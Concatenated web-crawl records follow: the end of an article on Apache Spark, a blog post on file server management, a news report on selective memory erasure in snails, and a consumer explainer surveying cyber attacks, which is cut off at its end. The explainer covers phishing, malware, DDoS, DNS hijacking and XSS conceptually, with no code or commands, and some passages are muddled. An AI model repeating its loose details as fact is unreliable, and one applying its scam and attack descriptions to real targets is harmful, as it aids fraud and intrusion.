It’s modular: Spark is essentially a modular toolkit initially designed to work with Hadoop via the YARN cluster manager interface. This pairing with Hadoop made sense as Hadoop provided both the compute and storage resources. Spark offered many tools for processing data and Hadoop handled large volumes of affordable persistent storage and scaling of the compute storage nodes. It became quickly apparent, however, that combining both compute and storage together wasn’t cost effective. Since then, many efficiencies have been introduced to support cloud-scale architectures, all in an attempt to decouple storage and compute. Spark is a valuable tool that could be used outside of Hadoop, and allows either resource to scale independently. Ultimately, this means regardless of what their organization’s favorite storage and compute infrastructure is, Spark empowers users to interface with that infrastructure.
Accepts data of any size and form: Spark emerged 10 years after Hadoop’s creation and was more focused on how data of any size could be combined to support the development of applications and analytical workloads. While Hadoop offered a variety of low-level capabilities, Spark provides a much broader and tailor-made environment that takes raw materials, turns them into reusable forms, and delivers them in analytic workloads. While Spark can work in a batch fashion, it can also work in an interactive fashion. As a result, Spark has become the go-to platform for most data applications and is especially well tailored to solving the problems of data engineering. Essentially, Spark outgrew Hadoop.
Supports multiple approaches and users: The Hadoop infrastructure ushered in the era of big data by creating a platform that could creatively and affordably store and process data at quantities never previously imagined, and then make that data usable through the MapReduce. But Spark was created to support the processes further up the stack as well. While Spark can access raw forms of data and interact with Hadoop file systems, Spark isn’t a single paradigm for achieving these aims, but instead built from the ground up to provide multiple approaches in processing architectures while using the same underlying data format.
Designed for the data engineer
Spark offers data engineers a large amount of elasticity and flexibility when approaching their work. For example, a TensorFlow job in Spark can access data in HDFS or multiple formats. Since Spark utilizes an API-driven approach, Spark engineers have a wide variety of tools to use with Spark as the analytics engine. This modularity enables use of open-source tools and avoids vendor lock-in with bespoke application-specific programming tools.
Since Spark now works with Kubernetes and containerization, engineers can spin up and spin down Spark clusters and manage them efficiently as Kubernetes pods versus relying on physical, standalone or bare-metal clusters. Deploying a Spark cluster on top of a Kubernetes cluster leverages the hardware abstraction layer managed by Kubernetes. This further frees up a data engineer to do data engineering and avoid the complex and often time-consuming work of IT administration and cluster management.
Spark is a tool that was created to not only solve the problem of data engineering, but also be accessible and helpful to the people who are further down the data pipeline. Thus, while Spark was designed for data engineers, it is actually increasing the number of people who can get value out of data. By offering scalable compute with scalable toolsets, Spark empowers engineers to empower others to leverage data to the fullest. Perhaps, then, not only is Spark a data engineer’s best friend — but is everybody’s best friend?
Don has spent the past 20 years building, testing, marketing, and selling enterprise storage, networking, and compute solutions in the rapidly evolving information technology industry. Today, his focus is on HPE Ezmeral: the ultimate toolkit to manage, deploy, execute, and monitor data-centric applications on software- and hardware-based architectures in the cloud, on premises, and at the edge. | <urn:uuid:06961e04-e9dd-43b3-ba88-da2a2ff64fa3> | CC-MAIN-2022-40 | https://www.cio.com/article/189412/spark-a-data-engineer-s-best-friend.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334992.20/warc/CC-MAIN-20220927064738-20220927094738-00316.warc.gz | en | 0.936004 | 1,426 | 2.59375 | 3 |
True work revolves around the access and modification of files, and what better way to store and distribute work files than through a file server? The central-access model for storing and managing files brings many benefits to an organization. Most importantly, everyone can access a single, accurate version of any file on the server. Easy as that sounds, this feat is only possible with proper file server management.
This post explores the concept of file server management from both a how-to and best practice standpoint. To set a solid foundation for the discussion, we’ll need a universal definition for file server management. This way, every other argument builds on the knowledge needed to implement a file server.
What Is File Server Management?
File server management involves the upkeep of hardware and software components of a central storage resource in a network. Usually, we invest all focus on the actual file storage in an operating system. However, because the term “file server” also refers to the actual machine on which the files live, neglecting their health is detrimental (eventually) to the health of any objects they store.
With the hardware consideration out of the way, let’s turn our attention towards the software aspect of file server management. So many software products/brands exist to help server administrators with file server management. Realistically, a file server exists as part of an overall business-enhancement network that includes other types of servers (application, print, database, etc.). This easily includes file servers in a DevOps engineer’s domain.
Being in charge of a file server means not only that you should make sure it performs its operations efficiently, but also that you should make sure it fits into the bigger picture seamlessly as well. To paint a crystal-clear picture of what such a management role entails, let’s compare how maintaining file servers differs from maintaining other kinds of servers.
Managing File Servers vs. Other Kinds of Servers
Unlike other kinds of servers (see list below), file servers act solely as the static storage location of files on a network. Yes, new files get added to the server regularly, but compared to application servers, the major intent with file servers is to have a silo of work files. Reasons for this include safekeeping in case of damage, and the facilitation of collaboration on contained files.
Now for a review of other types of servers.
A central print task management and scheduling machine removes the need for printers next to every workstation. The difference between a print and a file server is that a print server never actually stores files. Rather, it lines up tasks from print requests with details of files to print. After a print executes, you cannot access the file as you would in a file server.
These are high-performance machines that execute machines on behalf of client nodes. They remove the need to install and run separate instances of applications on workstations across a network. While they may connect to file servers to remove the burden of drive space management, their task is to host active file types (compiled source code). A good example of an application server is one that hosts a central instance of an antivirus application that protects all machines on a network.
These types of servers are information silos that arrange data into relations (tables) to facilitate access through queries as reports. Typically, a database management system (such as Microsoft SQL Server) handles the access/update activities of a database server. Some database types can store file objects. However, the fundamental difference between them is that file servers only store actual files in their original forms, not in tables.
You’ll find proxy servers between client-server networks managing requests while adding a layer of security by cutting direct contact between network components. Smart proxies route requests to the nearest or best resolution destinations.
A subcategory of application server types, mail servers host email communication services (and configurations) and remove the load of storing, sending, and pulling emails to and from destination addresses.
Some file servers extend web servers as resource locations. In this scenario, we’d find media files (pictures, videos, etc.) along with documents that web applications query and update repeatedly. Note that no source code files execute from within file servers. Otherwise, they’d double as web application servers.
Apart from a file server management software service installed on the file server, no applications run on it (or from it) for remote access. If applications’ binaries live on the file server, it simply acts as a download server rather than an application server.
File Server Management Best Practices
While managing file servers, the following best practices make for smooth access and update activities.
1. Maintain a Strict Permissions Policy
Permissions determine how far an individual user or user department can access and alter the state of a file folder or any individually existing object in a file server. As a general rule, users should not have full access to the entire file server’s assets. This would imply the ability to view, edit, and delete existing files. Full access also extends the ability to create new objects in the file server.
Without a strict permissions policy, a server is barely secure. Consequently, this puts sensitive files in the line of harm from unintended deletion and unauthorized copying (potential leaks). Each user should have the least possible permissions to the server and containing files. This way, their productivity is unhindered, while we do not have to negotiate security on their behalf.
2. Establish a Regular Backup Strategy
Backups are static historic records of the state of files on a server—a snapshot, if you will, of the entire file server. They’re crucial restarting points when servers unexpectedly fail. The more backups you conduct within a time frame, the closer to the latest (unsaved) state your restarting point will be.
Establish and adhere to a regular database backup strategy to avoid losing valuable work hours to server failures. Typically, daily backups should suffice when there’s little to no traffic to the server (after work hours), with cyclical incremental backups done weekly.
3. Implement a “File Recovery” Strategy Early
Backups are, to some extent, a file recovery strategy. However, more advanced file recovery methods should be in place at an early stage of your file server’s life cycle. Typically, these are part and parcel of larger server management software offerings. Building your file server around server management software is a holistic approach that aids with scaling and maintaining file health.
4. Group Your Files Wisely
File grouping goes hand in hand with permissions and access management. Having departmental partitions is a good start. However, work cross-access into any grouping strategy so that users who need access to those work files have it. In the same light, seclude sensitive files from the rest of the server’s contents, regardless of which group they originate from.
5. Conduct Regular Audits of the Entire Server
Implement an iterative health audit to ensure the smooth functioning of your file server. With this said, it helps if the server management suite you’re using provides dashboards for full visibility into your server and its objects. This way, you have a single source of truth into the state of files and the server (both soft and hardware elements).
File servers provide a smart abstraction of business assets from the workstations that modify them in the name of work. The effective management of file servers requires intentional effort. Part of the activities and best practices necessary for the upkeep of file servers includes regular backups, frequent health audits, and the enforcement of a strict permissions policy.
Depending on the scale of your file server, the practices suggested herein are easier said than done. However, including a server management partner, such as Netreo, into your strategy, goes a long way toward making short work of file server management.
This post was written by Taurai Mutimutema. Taurai is a systems analyst with a knack for writing, which was probably sparked by the need to document technical processes during code and implementation sessions. He enjoys learning new technology and talks about tech even more than he writes. | <urn:uuid:16e24b47-7cbb-4849-94d1-6675be4fa93f> | CC-MAIN-2022-40 | https://www.netreo.com/blog/file-server-management/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335396.92/warc/CC-MAIN-20220929225326-20220930015326-00316.warc.gz | en | 0.922469 | 1,692 | 2.53125 | 3 |
Different types of memories stored in the same neuron of the marine snail Aplysia can be selectively erased, according to a new study by researchers at Columbia University Medical Center (CUMC) and McGill University and published today in Current Biology.
The findings suggest that it may be possible to develop drugs to delete memories that trigger anxiety and post-traumatic stress disorder (PTSD) without affecting other important memories of past events.
During emotional or traumatic events, multiple memories can become encoded, including memories of any incidental information that is present when the event occurs.
In the case of a traumatic experience, the incidental, or neutral, information can trigger anxiety attacks long after the event has occurred, say the researchers.
“The example I like to give is, if you are walking in a high-crime area and you take a shortcut through a dark alley and get mugged, and then you happen to see a mailbox nearby, you might get really nervous when you want to mail something later on,” says Samuel Schacher, PhD, a professor of neuroscience in the Department of Psychiatry at CUMC and co-author of the paper.
In the example, fear of dark alleys is an associative memory that provides important information — e.g., fear of dark alleys — based on a previous experience.
Fear of mailboxes, however, is an incidental, non-associative memory that is not directly related to the traumatic event.
“One focus of our current research is to develop strategies to eliminate problematic non-associative memories that may become stamped on the brain during a traumatic experience without harming associative memories, which can help people make informed decisions in the future — like not taking shortcuts through dark alleys in high-crime areas,” Dr. Schacher adds.
Brains create long-term memories, in part, by increasing the strength of connections between neurons and maintaining those connections over time. Previous research suggested that increases in synaptic strength in creating associative and non-associative memories share common properties.
This suggests that selectively eliminating non-associative synaptic memories would be impossible, because for any one neuron, a single mechanism would be responsible for maintaining all forms of synaptic memories.
The new study tested that hypothesis by stimulating two sensory neurons connected to a single motor neuron of the marine snail Aplysia; one sensory neuron was stimulated to induce an associative memory and the other to induce a non-associative memory.
By measuring the strength of each connection, the researchers found that the increase in the strength of each connection produced by the different stimuli was maintained by a different form of a Protein Kinase M (PKM) molecule (PKM Apl III for associative synaptic memory and PKM Apl I for non-associative).
They found that each memory could be erased — without affecting the other — by blocking one of the PKM molecules.
In addition, they found that specific synaptic memories may also be erased by blocking the function of distinct variants of other molecules that either help produce PKMs or protect them from breaking down.
The researchers say that their results could be useful in understanding human memory because vertebrates have similar versions of the Aplysia PKM proteins that participate in the formation of long-term memories.
In addition, the PKM-protecting protein KIBRA is expressed in humans, and mutations of this gene produce intellectual disability.
“Memory erasure has the potential to alleviate PTSD and anxiety disorders by removing the non-associative memory that causes the maladaptive physiological response,” says Jiangyuan Hu, PhD, an associate research scientist in the Department of Psychiatry at CUMC and co-author of the paper.
“By isolating the exact molecules that maintain non-associative memory, we may be able to develop drugs that can treat anxiety without affecting the patient’s normal memory of past events.”
“Our study is a ‘proof of principle’ that presents an opportunity for developing strategies and perhaps therapies to address anxiety,” said Dr. Schacher.
“For example, because memories are still likely to change immediately after recollection, a therapist may help to ‘rewrite’ a non-associative memory by administering a drug that inhibits the maintenance of non-associative memory.”
Future studies in preclinical models are needed to better understand how PKMs are produced and localized at the synapse before researchers can determine which drugs may weaken non-associative memories.
Materials provided by Columbia University Medical Center. Note: Content may be edited for style and length.
- Jiangyuan Hu , Larissa Ferguson , Kerry Adler , Carole A. Farah , Margaret H. Hastings , Wayne S. Sossin , Samuel Schacher. Selective Erasure of Distinct Forms of Long-Term Synaptic Plasticity Underlying Different Forms of Memory in the Same Postsynaptic Neuron. Current Biology, 2017 DOI: 10.1016/j.cub.2017.05.081 | <urn:uuid:f10d352c-9b5a-48cd-b4f5-ec1d29332b60> | CC-MAIN-2022-40 | https://debuglies.com/2017/06/23/select-memories-can-be-erased-leaving-others-intact/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337853.66/warc/CC-MAIN-20221006155805-20221006185805-00316.warc.gz | en | 0.920718 | 1,057 | 2.875 | 3 |
How Every Cyber Attack Works – A Full List
Which of these cyber attacks will hack you?
You must have heard it on the news: “Country X accuses country Y for launching a cyberattack against its infrastructure” or “Huge leak at Corporation X, account information of millions of users leak”. Sometimes, you don’t even need to hear it on the news, but instead, it is right there, plastered all over your computer screen: “Your information has been encrypted, and the only way to recover it is to pay us”. All of these are cyber attacks.
What is a cyber attack?
Cyber attacks are malicious Internet operations launched mostly by criminal organizations looking to steal money, financial data, intellectual property or simply disrupt the operations of a certain company. Countries also get involved in so-called state-sponsored cyberattacks, where they seek to learn classified information on a geopolitical rival, or simply to “send a message”. The global cost of cybercrime for 2015 was $500 billion. That’s 5 times Google’s yearly cash flow of 90$ billion dollars. And that number is set to grow tremendously, to around 2 trillion dollars by 2019. In this article we want to explore the types of attacks used by cybercriminals to drive up such a huge figure, and also help you understand how they work and affect you.
Quick links for navigation
- Cyber fraud
- Malware attacks
- Social Engineering Attacks
- Technical attacks
- Vulnerability Exploitation
- Login Attacks
- Malicious content
- Groups that launch cyber attacks
During a standard phishing attack, a malicious hacker tries to trick the victim into believing he is trustworthy, in order for the user to do a certain action. The most famous of these is the “Nigerian prince” scam. In case you haven’t heard of it, the malicious hacker claims to be a wealthy Nigerian who requires your help in transferring tens of millions of dollars out of his home country. As a reward for your service, the “prince” will send you a hefty sum of money. All you have to do is to provide him with some personal information (we’ll explain why they need this info later on) and a small fee to process the money transfer, and you’re rich for life! Of course, it’s all a scam. There is no Nigerian prince or tens of millions of dollars. The only real money in the scheme is the “processing fee” you provide. Unfortunately, the return policy for malicious hackers can be summed up like this: Malicious hackers send out thousands, or even hundreds of thousands of phishing emails in order to maximize the number of infected users.
Spear phishing attacks
Regular phishing attacks are massive spam campaigns, where the malicious hacker hopes that as many people as possible click the link/install the attachment. Spear phishing on the other hand is much more targeted. It involves personalizing the phishing email around the receiver. Here are some examples:
- The phishing email is designed to look like it came from a bank (or another type of trusted entity). Due to some technical issues or any other reason, they ask you to reenter your login information for your bank account. But the form you type in the login info belongs to the malicious hacker, who can now clean your bank account.
- You get a fake email disguised as a Gmail/Yahoo/Outlook email, which requires you reenter your login information to confirm “it’s really you”. Some cheeky cybercriminals might even say someone else tried to log in to your account. This is the method use for one of the most high-profile hackings of recent years.
- A fake email from a manager/CEO about important company files. In such cases, the spear-phishing email will contain a malware infected Excel/Word file that once opened will unleash a malware attack on your PC. In these cases, the hacker is more interested in the company’s data, not your own (that’s why it’s called the CEO fraud).
This happens whenever a company or organization discloses personal information about you, without asking for your authorization. This happens for instance when a medical provider leaks your personal health information.
Whaling is a more refined version of phishing. This time around, a malicious hacker targets a specific, high-value person, such as the CEO of a company or a high-ranking politician. In order to carry out a whaling attack, the malicious hacker gathers as much information about the target as possible, such as details about friends, occupation, passions, hobbies and so on, just so the victim has a higher chance of clicking the link or opening the attachment. Whaling is a niche pursuit for cybercriminals, but a highly profitable one. Companies lost nearly 2.3 billion dollars in a 3 year period due to whaling attacks targeting CEO’s.
Malware attacks and infections
Most frequently, malware attacks are delivered as malicious attachments to a phishing email or through downloads on suspicious spam websites. The infection takes place the moment you open up the attachment to see what it’s really about. In other, rarer instances, it’s possible for the malware to be downloaded on your PC without you even approving of it. These are called drive-by-downloads and are worth their own, separate discussion.
Some types of malware try to stay as hidden as possible, while quietly collecting valuable information about you in the background. Online attackers use spyware to find out deeply personal information such as passwords, credit card data, personal photos. Keyloggers, form-grabbing malware are all included in this category. In order to remove them, you’ll usually require a good antivirus or malware removal software. Advertisers on the other hand, look for information related to your internet usage habits, such as location and search history, hobbies, interests in order to better target you with ads. Spyware from advertisers usually comes in free software such as browser toolbars, music programs, that come either stand-alone or bundled with another program. While not as bad as the first category, this type of spyware still limits your privacy and comes with vulnerabilities of their own. Fortunately, a simple uninstall should be sufficient to remove it from your computer.
Rootkits are malware that infects your PC on a deeper level, in order for them to be undetectable. Computers are structured in layers. A program can only modify other software from the same layer or above, but not from a deeper one since it doesn’t have access. For instance, a program like Excel, Photoshop or Word aren’t able to modify underlying software such as the software drivers for graphic cards or sound cards. The deepest layer is the BIOS, which controls a PC’s boot-up procedure and other software aspects. Rootkits usually target this access layer since an antivirus program has a very difficult time finding and removing the rootkit. Rootkits can enslave computers into a botnet, listen in on a user’s internet traffic, or make other types of malware undetectable. It’s safe to say they are the worst type of malware infection out there.
Most people think that virus = malware. But that’s not actually the case. A virus is a type of malware. In other words, all viruses are malware, but not all malware are viruses. A virus is a type of malware that can spread and infect other computers, hence the name virus. A single computer can spread a virus in a whole network, usually by infecting other files that are then shared to the rest of the network.
Trojan horse malware
Named after the famed wooden horse used to conquer Troy, Trojan malware infects your PC by making you think they are a completely different sort of program. For instance, the program might claim to be antivirus software but is actually a keylogger or spyware in disguise.
The most widespread types of ransomware encrypt all or some of the data on your PC, and then asks for a large payment (the ransom) in order to restore access to your data. This type of malware has experienced a wild surge in popularity, in large part thanks to anonymous cryptocurrencies, such as Bitcoin. Source
A botnet is a network of infected computers that are enslaved to a single command & control center. The computers in a botnet act in unison, so that they all do the same thin simultaneously. Malicious hackers use botnets for some of the nefarious cybercrimes out there, such as DDoS attacks, mass farming for Bitcoin or for gathering user data.
Time bombs and logic bombs
Time bombs and logic bombs are malicious code hidden within programs or network systems. They activate and launch a malware attack either at a certain time, in case of time bombs, or when certain conditions are met, in case of logic bombs. Attackers use logic bombs in multiple ways, such as deleting databases, preventing the deletion of corrupted code, or sending valuable information about the victim back to the malicious hacker.
Blended threats are attacks that combine two or more malware in order to maximize their efficiency. Blended threats combine Internet worms with viruses, keyloggers, ransomware, Trojans and any other type of malware in order to improve the spread and amount of damage inflicted.
Worms are malware designed to self-replicate and spread on the Internet using network connections without any human interference. Unlike a computer virus, worms don’t need a host program. They are standalone pieces of software. One of the most famous worms out there was developed way back in 2005 and targeted MySpace. Nicknamed the “Samy worm” after its creator, it managed to gather 1 million friend requests for Samy within a day.
Remote Access Trojan
Remote Access Trojans, or RAT’s for short, are Trojan malware that give an attacker administrative control over the infected computer. Once a RAT installs itself, the cybercriminal can control the PC remotely, allowing him to install keyloggers, form grabbing malware, activate the webcam, format drives, create a botnet and pretty much anything else you can think of.
An exploit kit hides in a web page/server and looks for vulnerabilities in your PC. It does this by analyzing the traffic sent between your PC and the web page. After it finds a vulnerability, the exploit will launch a targeted attack against it, using either malware or any other exploit method. Particularly vulnerable applications are those that communicate with the Internet, such as Flash, Chrome, Firefox, Apple Quicktime and so on.
This is malicious software used to feed you ads and track your online behavior in order to improve how advertisers can target you. Oftentimes, adware comes attached to free programs such as music players or other comparable software.
Social engineering attacks
Social engineering attacks are those in which the cybercriminal actively makes contact with you, by pretending to be someone else, and manipulating you into revealing your data.
Short for “voice phishing”, in this sort of engineering attack, a scammer will call you either over the phone or Internet voice apps such as Skype. The pretext varies, but in almost all cases, the scammer is after your money. He can pose as a bank clerk, asking you to reconfirm your personal data, or it can be an employment agency asking you for an advance. In one of the more insidious cases of vishing we’ve heard of, the scammer might pretend to hold a loved one hostage, and claim to harm them if you won’t pay a ransom.
Phishing done over SMS/text messages. Like most phishing attacks, smishing targets your financial data, by pretending to come from a trusted source such as a bank. Passwords, credit card details, email accounts are all viable smishing targets.
Customer support scams
A popular scam that attackers use against tech users who aren’t familiar with more advanced technical concepts. The scammer will pose as a customer support representative, and claim that your software or hardware has technical issues that need urgent fixing, otherwise he might risk a catastrophic system failure. In exchange for the kind scammer’s expertise on how to fix the issue, you have to pay a decent sum. Of course, there never was any issue, and your money is lost forever.
Possibly the most romantic type of scam out there. Catfishing involves creating a fake online persona in order to trick people on dating sites to break-up with their money. The catfisher will stalk social media networks or dating sites, looking for emotionally vulnerable people seeking a relationship. The scammer seduces the victim, although the relationship is carried only over the phone or text. The two never meet, since the scammer claims he is from outside the state or country, on extended business trips or military tours. At some point, the scammer brings up an urgent problem that requires a sum of money in order to resolve. The reasons vary from story to story. Some might say they need money in order to obtain a visa to join the victim in their home country, in other cases, they claim they have a large amount of gold stuck in customs that requires a fee in order to allow passage into the country. Of course, the stories are all fake. The victim gets their heartbroken, and also lose their money.
The (literally) dirtiest form of social engineering attacks. Dumpster diving involves digging through your actual trash in order to find valuable information about you, such as credit card data, social security numbers, phone numbers, email addresses, passwords (for people who actually write down theirs on paper). That’s why a shredder is good to have in any home.
These types of attacks often target cyber infrastructure such as databases, DNS, outdated software and similar techniques.
Malvertising is the practice of spreading malware through online ads. The attacker can either infect an already existing legitimate ad with malicious code, or he might put up his own infected one. Malvertising is very advantageous for a malicious hacker, since he doesn’t need to worry how to spread the malware. The ad network does all the hard work and exposes thousands or even millions of users to malware. On top of that, malvertising is difficult to detect, and can bypass firewalls and otherwise avoid various user safety measures.
Normally, Internet pages are stored using numbers, not words. These numbers are called IP addresses. In order to make them easier to remember for humans, these IP addresses are translated into letters and names. The translation from IP addresses to names takes place on Domain Name Servers, shorted as DNS. The information is also stored there. During DNS hijacking, an online attacker will override your computer’s TCP/IP settings so that the DNS translation gets altered. For example, a typing in “cnn.com” will translate it into this IP: 22.214.171.124. A DNS hijacker however, will alter the translation so that “cnn.com” will now send you the IP address of a different website.
During a URL injection, a malicious hacker infects a website by creating new pages in it. These pages in turn contain malicious links, spammy words or even malicious code that forces visitors on the page to be part of a DDoS attack or redirects them to a different website. A malicious hacker can do a URL injection thanks to weaknesses in IT infrastructure, such as WordPress plugins or within any other type of HTML code.
Flooding describes the technique used in DDoS attacks, where an attacker sends a huge amount of information against a target, blocking it from processing any other information whatsoever. Depending on the attack vector they use, flooding attacks can be classified as follows: · User Datagram Protocols (UDP) flood. This UDP is in charge of sending so-called datagrams, meaning packets of information, between computers. · HTTP floods work by abusing the GET function of a website, which provides information to the browser, and the POST function, which creates content. The flood will force the server website to focus only on these functions, and divert processing power from all other aspects.
Passive attacks look to acquire information about you, while limiting any other type of damage done to your system, so as to not raise any suspicion there might be something wrong with your PC. Here’s an example of a passive attack.
Short for (Distributed) Denial of Service, these sorts of cyber attacks seek to disrupt the Internet use of a user or service, by flooding its connection with useless information such as enormous amount of login attempts or excessive amount of traffic. Unlike a DoS attack, a DDoS relies on a large number of devices that can simultaneously assault the target, hence the name “Distributed” since the attacker’s resources are spread across many computers or other devices. Most cases involving DDoS attacks involve a botnet that has a sufficient amount of enslaved devices capable of launching a concerted attack. Here’s an example of a botnet attack that relies on millions of enslaved Internet of Thing devices.
Web page defacing
As the name suggests, a malicious hacker or group will break into a website and change its visual appearance in order to send a message or warn the owner of the website. Some of the more high profile practitioners of web defacement is the Anonymous hacker group, who managed to break into the Islamic State’s website and replace it with Viagra ads.
Cyber sabotage mostly concerns companies, corporations and nation-states rather than individual users. In most cases, the attacker or hacker group targets a vital part of the victim’s Internet infrastructure. One prime target, for instance, is a country’s electrical power grid or data regarding military installations. Probably the most famous and devastating type of cyber warfare sabotage was the Stuxnet worm that targeted Iran’s nuclear program. This worm was specifically designed to target Siemens centrifuges used to enrich uranium in Iranian nuclear power plants. By modifying the rotation patterns, Stuxnet was able to destroy a significant amount of centrifuges, and delay Iran’s nuclear program by several years.
Snooping in on someone’s traffic is a technique malicious hackers use frequently in order to acquire data on their target. A prime target for sniffing is a wireless Internet router or Wi-Fi. Particularly vulnerable Wi-Fi are those that use a simple WEP or WPA encryption, instead of the standard WPA2. Brute-force/dictionary attacks easily break the password for WEP/WPA encryption, and using dedicated sniffing software or a hardware tool, the malicious hacker can basically see the traffic going through the router, or he might redirect all the traffic to his own, cloned Wi-Fi. Sniffing the traffic sent over a Wi-Fi gives the hacker a complete, real-time view of a user’s Internet activities. This exposes everything from passwords, email accounts and other similar types of information. Here’s a more in-depth guide on how to protect yourself from a public Wi-Fi attack.
Advanced Persistent Threats, a.k.a. APTs
Sometimes, a malicious hacker group wants to do more than just a hit and run attack. A long-term infiltration in the IT system of a government, corporation or even a high-value individual can provide a lot more information and control. These types of infiltrations are called Advanced Persistent Threats and are carried out using rootkits, Trojans, Zero-Day exploits. To successfully penetrate high-value targets, such as government or financial infrastructure, the malicious hackers might even develop their own, specialized malware.
A technique used to obtain the details of a person’s credit/debit card by using a specialized card reader. In most cases, the card reader is placed over a legitimate bank ATM or similar devices, and stores the magnetized data for each and every card it scans. Afterwards, the scammer imprints the magnetized data over blank cards. By then, it’s just a matter of emptying the victim’s bank account using his own credit/debit card data.
Man in the Middle attacks
Normally, Internet communication happens between two parties, meaning the sender and the receiver. During a Man-in-the-Middle attack, a malicious hacker places himself between your device and the website or app you’re communicating with. This then gives him access to both your inbound traffic, and the outbound traffic. In practice, this allows the malicious hacker to see everything you do on the Internet, such as passwords, browsing history, credit card details, email accounts. You name it. A pharming attack can target either an individual user with phishing emails or he might actually poison a DNS (domain name system) server. By poisoning a DNS system, the malicious hacker can redirect traffic from one or more addresses on the DNS server, to any other website of his choosing.
An attack designed to harvest important data such as passwords, credit card data, emails and other such information. The attacker will first find a way to redirect traffic from a legitimate web page to a fake one he controls. If this fake web page contains any forms, then the victim will inadvertently fill out all of his private information. Pharming attacks target both individual users and DNS servers. When targeting users, malicious hackers send a phishing email that modifies a user’s files in order to redirect him from site A to site B. DNS attacks, or poisoning as they are known, targets the servers hosting a website’s DNS names. This allows a cybercriminal to redirect traffic from any website in the database to another website of his choosing.
By reusing information sites use to identify you, a malicious hacker can fool a website or service into giving them access to your account. For example, in order to log in to a website using Facebook, the social network will send a string of information to the site in question in order to confirm that it is really you who wants to log in. If a malicious hacker could somehow find and reuse that string of information, he could theoretically use it to trick the site into thinking he was actually you, thus obtaining access to your account on that website.
Remote access refers to any type of attack where the malicious hacker ends up taking control of your PC from a distance, by using his own separate PC. Remote access attacks are made possible by rootkits and types of malware which infected your PC in previous attacks. These then created a back door that allow the hacker to control your.
During a spoofing attack, the malicious hacker tries to disguise himself as another user or Internet device, in order to trick the victim into relaxing their defenses. Spoofing has multiple variations, depending on the identification methods used: email, DNS or IP address spoofing. In an email spoofing, the attacker will forge the email in the “From” section to make it look like a genuine one you might receive from a boss or loved one. An IP address spoofing will create a fake Internet Protocol address which a computer will then use to hide the identity of his computer, or impersonate someone else’s PC. Here’s an interesting conversation on StackExchange which discusses the limitations of IP spoofing.
Even the best software has its imperfections, and those are ruthlessly exploited by malicious hackers whenever possible. On a more fortunate note, software vulnerabilities are frequently patched by updates. For this reason, “update your software!!!11” is one of the most frequent types of cybersecurity advice, along “use a strong password!!!11” and “don’t click on that!!!11”
A buffer overflow takes place when a software or program tries to store more data than possible in a temporary storage space, known as a memory buffer. The excess data then spills over into other parts of the memory, overwriting the adjacent memory. A buffer overflow is frequently used to overwrite data in areas containing executable code. This replaces the existing code with a malicious one. If the attack is successful, the malicious hacker can then take complete control of the device.
A frequently used malicious hacking technique in which the attacker exploits a vulnerability in the software in order to inject code in the program. This program then executes the code, producing the attacker’s desired result, such as shutting down the device, taking control of it or any other type of malicious intent.
Cross site scripting (XSS)
Also known as an XSS attack, cross site scripting requires a blackhat hacker inject malicious code into an otherwise trustworthy web page. Once a user does a certain action (such as leaving a comment), then the malicious code in the web page springs into action, infecting the user itself. A malicious hacker infects the web page by exploiting vulnerabilities in the page’s code or any web plugins that happed to be installed.
Zero-Day exploits are nightmare scenarios, where an attacker discovers an unpatched vulnerability in a piece of software (that even its maker doesn’t know about) and then proceeds to exploit it to the fullest. In order for a user to avoid a Zero-Day attack, he has to either avoid using the vulnerable program or wait for the developer to release a software update. For example, malicious hackers used a Zero-Day vulnerability in the Sony Entertainment hack a few years back.
Instead of targeting websites and other types of infrastructure, browser hijackers go after individual users. By exploiting vulnerabilities in browsers, a malicious hacker can infect a user with adware, or redirect his traffic to a web page of his own choosing.
Time of check to time of use bugs
In order to do some particular things online, such as posting on Facebook, you need to go through a two-stage process. The first one is “time of check”. this means that Facebook must first verify if you are able to do said action. In most cases, verification means you must log into the social network. The second step is “time of use”, which, in our case, is the process of actually posting on Facebook. Time of check to time of use bugs allow a malicious hacker to somehow bypass “time of check” and go directly to “time of use”. Imagine the following scenario: your Facebook login information gets hacked, and a malicious hacker logs into your account and starts using it. You immediately find out about it, and change both the email and password for your account. Even though you changed the “time of check” settings, the malicious hacker is still in the “time of use” phase, messing up your social media life by sending coworkers awkward photos of you in pajamas you had originally sent to your loved one.
As a security feature, computers come with several built in security layers, commonly referred to as “rings”: 1. The top ring is the one housing applications such as games, Word, Excel, etc. 2. The middle rings control device drivers, such as graphic and sound cards. 3. Finally, the bottom ring, and also the deepest one, is the kernel. This control the boot-up process and just about anything else in the PC. Privilege escalation attacks allow a malicious hacker to exploit a flaw in a software that gives him access to other parts of the computer. For instance, he might find a vulnerability in the graphics driver, which allows him to make his way up the access rights chain and gain control of wider sections of the device.
Supply chain attacks
Companies rely on other companies to provide them with the resources they need to conduct business. This creates something called a supply chain, where each company provides a component to the end product. A cybercriminal could end up hacking into the end product by compromising just one company in the supply chain. For instance, if a malicious hacker infects all the memory hard drives produced by a certain manufacturer with a rootkit, then the attacker will automatically infect all of the PCs that have those hard drives built in.
Cybercriminals would love to get access to your accounts and passwords. Especially if they’re email accounts, which they can then use to take control of any other associated credentials. Here’s how a malicious hacker can break into your login credentials.
Brute force attacks
A password guessing attack that involves trying a huge amount of passwords on a login screen until the attacker finally finds the right one. A brute force attack can guess a weak password with 8 or less characters in a few hours or days at most. Adding a few special characters and making it 10 or more characters long will dramatically increase the cracking time, to the point where it would take decades or even centuries to crack.
Similar to a brute-force attack, except that this time, the attacker configures his software around certain letters or words he suspects you might include in the password. For instance, if you are a pizza lover, he might instruct the software to first try out password combinations that contain the word pizza such as “pizzaislifeyeah” or “wick3dpizza”.
OAuth is the technology used for “Login with Facebook” or “Login with Google” buttons. In most cases, OAuth is a very secure login protocol, but many app developers do a poor job implementing it. Normally, when you press the “Login with Facebook” button, the app asks Facebook “is this guy legit?”, the social network then answers back “yes he is, allow him to pass”. However, many apps want to shorten the time it takes for you to actually start using it, so they skip the part where Facebook confirms it’s really you, and just log you in instantly. This allows a malicious hacker to manipulate the login process and gain access to your account.
Some malicious hackers aren’t interested in infecting you with malware. Instead, they want you to give them money willingly.
